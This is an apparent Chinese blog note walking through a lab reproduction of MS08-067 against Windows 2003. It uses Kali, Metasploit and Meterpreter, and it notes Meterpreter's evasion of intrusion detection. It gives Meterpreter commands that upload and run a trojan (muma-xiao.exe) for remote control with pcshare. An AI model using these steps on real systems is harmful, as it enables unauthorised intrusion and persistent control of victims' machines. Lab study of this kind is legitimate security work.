meterpreter后期攻击使用方法

  • 2022 年 8 月 14 日
  • 筆記

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpretershell的链接。Meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。最后,Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。

今天复现一个windows 2003的漏洞,代号为ms08-067
使用工具:Kali 、msfconsole、pcshare、windows 2003
具体步骤如下。

## 1.kali系统进入msfconsole

## 2.搜索病毒代号输入search ms08-067


3.设置被攻击者的ip,也就是win2003的ip地址




4.开始攻击,显示攻击成功

5.回到物理主机制造木马,同时上传到被攻击电脑windows 2003 1. c盘




6.输入以下命令将木马文件上传到被攻击者的电脑C盘,然后运行,具体看下面图片

upload //root//muma-xiao.exe c:\muma-xiao.exe
execute -f c://muma-xiao.exe

总结:以上操作完毕后,win2003的c盘里就有了木马,名称为muma-xiao.exe,kali远程执行木马后,然后打开pcshare工具,即可以在图形化界面操控windows2003电脑